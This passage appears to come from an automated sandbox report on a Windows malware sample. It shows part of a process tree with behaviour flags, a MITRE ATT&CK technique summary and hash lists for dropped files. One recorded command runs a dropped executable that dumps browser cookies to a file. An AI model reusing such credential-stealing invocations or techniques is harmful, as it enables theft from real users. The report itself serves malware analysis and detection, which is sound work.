                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4068
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                    1⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:732
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                      2⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Checks processor information in registry
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:3568
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4560
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    PID:4688
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4980
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    PID:4296
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:5696
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:3032
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:5816
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                    1⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    • Executes dropped EXE
                                                                                    PID:1184
                                                                                  • C:\Users\Admin\AppData\Local\Temp\4235.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\4235.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:5856
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:5844
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                        PID:5960
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:5704
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5012
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:5160
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4460
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:4864
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5068
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:5360
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                1⤵
                                                                                                  PID:2764
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                  1⤵
                                                                                                    PID:5480
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:4948
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:2848
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6068
                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        PID:5516
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:3760
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:5840
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                          PID:4156
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:4572
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                            PID:4332
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:3972
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:796

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Persistence

                                                                                                          Registry Run Keys / Startup Folder

                                                                                                          1
                                                                                                          T1060

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Defense Evasion

                                                                                                          Disabling Security Tools

                                                                                                          2
                                                                                                          T1089

                                                                                                          Modify Registry

                                                                                                          5
                                                                                                          T1112

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Install Root Certificate

                                                                                                          1
                                                                                                          T1130

                                                                                                          Credential Access

                                                                                                          Credentials in Files

                                                                                                          3
                                                                                                          T1081

                                                                                                          Discovery

                                                                                                          Software Discovery

                                                                                                          1
                                                                                                          T1518

                                                                                                          Query Registry

                                                                                                          4
                                                                                                          T1012

                                                                                                          System Information Discovery

                                                                                                          5
                                                                                                          T1082

                                                                                                          Security Software Discovery

                                                                                                          1
                                                                                                          T1063

                                                                                                          Peripheral Device Discovery

                                                                                                          1
                                                                                                          T1120

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Collection

                                                                                                          Data from Local System

                                                                                                          3
                                                                                                          T1005

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files\Windows Security\AJFXCNAWHD\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\Windows Security\AJFXCNAWHD\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\install.dat
                                                                                                            MD5

                                                                                                            806c3221a013fec9530762750556c332

                                                                                                            SHA1

                                                                                                            36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                            SHA256

                                                                                                            9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                            SHA512

                                                                                                            56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                          • C:\Program Files\install.dat
                                                                                                            MD5

                                                                                                            31e4a5735b20be6a53cbb552663b1cc3

                                                                                                            SHA1

                                                                                                            c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                            SHA256

                                                                                                            b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                            SHA512

                                                                                                            3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                          • C:\Program Files\install.dll
                                                                                                            MD5

                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                            SHA1

                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                            SHA256

                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                            SHA512

                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                          • C:\Program Files\install.dll
                                                                                                            MD5

                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                            SHA1

                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                            SHA256

                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                            SHA512

                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                          • C:\Program Files\libEGL.dll
                                                                                                            MD5

                                                                                                            cc0f81a657d6887e246f49151e60123d

                                                                                                            SHA1

                                                                                                            1eb31528501c375817853e09d95b7152858c5b31

                                                                                                            SHA256

                                                                                                            31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                            SHA512

                                                                                                            8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                            MD5

                                                                                                            4c8fe6b2f96e01a5a6d418a7f1c843a7

                                                                                                            SHA1

                                                                                                            51842e81863c205e888bffe034a3abbf642c5419

                                                                                                            SHA256

                                                                                                            e6272d58a61f01f31f18f7b4ecc85232a1e71be4b9e93570395ad825e5ca6afa

                                                                                                            SHA512

                                                                                                            209986a1b77f039dac3c4e51a7c2a54af77b47261373e4f97290c8de21511dc181549ce656585c546ef616922aef5ee88f9d3cc98ae98e2b426dd4072688824a

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                            MD5

                                                                                                            745db20fd3e289a001fd17d7e73c7b28

                                                                                                            SHA1

                                                                                                            6e99d180a44e0f9226672e9c5cfd796561f3e619

                                                                                                            SHA256

                                                                                                            d1e8b6205077152ab171194ebac11a5a6afa62be991643d99d7831412eea96c4

                                                                                                            SHA512

                                                                                                            8a33dcef7f679f12c34151b0dbacbe738d0d46c75e73f67a93d494117c04376ea3a52ffa5b8adf8b319b380f690b444d2fa1db8d195587bfe938a716869a7a42

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                            MD5

                                                                                                            60f6b2c801a2a958b06c893b74b19282

                                                                                                            SHA1

                                                                                                            da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                            SHA256

                                                                                                            593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                            SHA512

                                                                                                            406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                            MD5

                                                                                                            80f08698d8c128f0448e7dc815bb99ba

                                                                                                            SHA1

                                                                                                            11627ee2a6862a24a462d67f4b1caf986f57f007

                                                                                                            SHA256

                                                                                                            7854ba8c2b027963c3bdf718ced50e6616ff0721e829f10578dabca216425bb9

                                                                                                            SHA512

                                                                                                            bef6cf4ec8c3f93bfbad1c099ae2949b6025e5bcde34cd8d36bcc33fcec6dd5cd3d68142b908c9a58a0dc691a22547520b7d6e02d74b5fa629aa5f88ad406727

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                            MD5

                                                                                                            ee2fb6b03d4c216caa6b7d2b615e485f

                                                                                                            SHA1

                                                                                                            fa57ecf0b94f3236cbaefb3d0afc42eadc2efcd9

                                                                                                            SHA256

                                                                                                            2c9b1ebd738e37c17abf38a89928de415b21da3588cbcb59f2f916630143aa79

                                                                                                            SHA512

                                                                                                            52e014f6a8e28485ee3050e7ca15dddc0071e86edcbd353032ee8bd4235ec59d0ac87bba9058f0f591c50160bbf7023f20427945ac85544a1da4dc8e82bcc278

                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                            MD5

                                                                                                            c0914599dc6a8488b1cf553ffaa87fbc

                                                                                                            SHA1

                                                                                                            d33d4f5dd30bebb07f1da63b7b3bec77a9595fb9

                                                                                                            SHA256

                                                                                                            70929a20a27ec05bb0a7e987124df9c72cbe405a4e7ec29c7b72aa1b534c06ba

                                                                                                            SHA512

                                                                                                            be1a44da36fa66d7581e4a4b0dd12dd418ee9e45d7675f23d7b6b3f72de7dd453e3e2b1acfa05eec9442580a071ec46b4e41b04dff362d14045819d88825ebd3

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\06-8be51-e4b-70f9b-72bb80141fb38\Myvanubasae.exe
                                                                                                            MD5

                                                                                                            18e49540637bccc9b3a7ca3d48cae223

                                                                                                            SHA1

                                                                                                            b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                            SHA256

                                                                                                            698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                            SHA512

                                                                                                            a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\06-8be51-e4b-70f9b-72bb80141fb38\Myvanubasae.exe
                                                                                                            MD5

                                                                                                            18e49540637bccc9b3a7ca3d48cae223

                                                                                                            SHA1

                                                                                                            b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                            SHA256

                                                                                                            698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                            SHA512

                                                                                                            a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\06-8be51-e4b-70f9b-72bb80141fb38\Myvanubasae.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\53a1q2yr.yt5\SunLabsPlayer.exe
                                                                                                            MD5

                                                                                                            41a4da1bf67864dbb200520d53e3d5d2

                                                                                                            SHA1

                                                                                                            6cfaa8ce5e2608be8473f19548065f7905d28e32

                                                                                                            SHA256

                                                                                                            4c76b1530c7aa30e5b0c246a8e4420cc5c9f45f2d987a76eaf7c09c4c3a55ab0

                                                                                                            SHA512

                                                                                                            937775b3c41361f069f2605358b40db6646a46a04f59b1feb42d348ef88a40e95731902fefb03274ed803b47e2ceb5a46b5aba45c69cd7845ff6c5027f3058cc

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\53a1q2yr.yt5\SunLabsPlayer.exe
                                                                                                            MD5

                                                                                                            41a4da1bf67864dbb200520d53e3d5d2

                                                                                                            SHA1

                                                                                                            6cfaa8ce5e2608be8473f19548065f7905d28e32

                                                                                                            SHA256

                                                                                                            4c76b1530c7aa30e5b0c246a8e4420cc5c9f45f2d987a76eaf7c09c4c3a55ab0

                                                                                                            SHA512

                                                                                                            937775b3c41361f069f2605358b40db6646a46a04f59b1feb42d348ef88a40e95731902fefb03274ed803b47e2ceb5a46b5aba45c69cd7845ff6c5027f3058cc

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5vsacokc.e1q\inst.exe
                                                                                                            MD5

                                                                                                            edd1b348e495cb2287e7a86c8070898d

                                                                                                            SHA1

                                                                                                            682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                            SHA256

                                                                                                            eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                            SHA512

                                                                                                            613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5vsacokc.e1q\inst.exe
                                                                                                            MD5

                                                                                                            edd1b348e495cb2287e7a86c8070898d

                                                                                                            SHA1

                                                                                                            682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                            SHA256

                                                                                                            eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                            SHA512

                                                                                                            613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                            MD5

                                                                                                            41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                            SHA1

                                                                                                            0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                            SHA256

                                                                                                            97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                            SHA512

                                                                                                            5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                            MD5

                                                                                                            41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                            SHA1

                                                                                                            0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                            SHA256

                                                                                                            97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                            SHA512

                                                                                                            5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                            MD5

                                                                                                            3b1b318df4d314a35dce9e8fd89e5121

                                                                                                            SHA1

                                                                                                            55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                            SHA256

                                                                                                            4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                            SHA512

                                                                                                            f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                            MD5

                                                                                                            3b1b318df4d314a35dce9e8fd89e5121

                                                                                                            SHA1

                                                                                                            55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                            SHA256

                                                                                                            4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                            SHA512

                                                                                                            f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                            MD5

                                                                                                            3bc84c0e8831842f2ae263789217245d

                                                                                                            SHA1

                                                                                                            d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                            SHA256

                                                                                                            757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                            SHA512

                                                                                                            f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                            MD5

                                                                                                            3bc84c0e8831842f2ae263789217245d

                                                                                                            SHA1

                                                                                                            d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                            SHA256

                                                                                                            757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                            SHA512

                                                                                                            f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                            MD5

                                                                                                            e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                            SHA1

                                                                                                            1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                            SHA256

                                                                                                            8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                            SHA512

                                                                                                            71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                            MD5

                                                                                                            e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                            SHA1

                                                                                                            1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                            SHA256

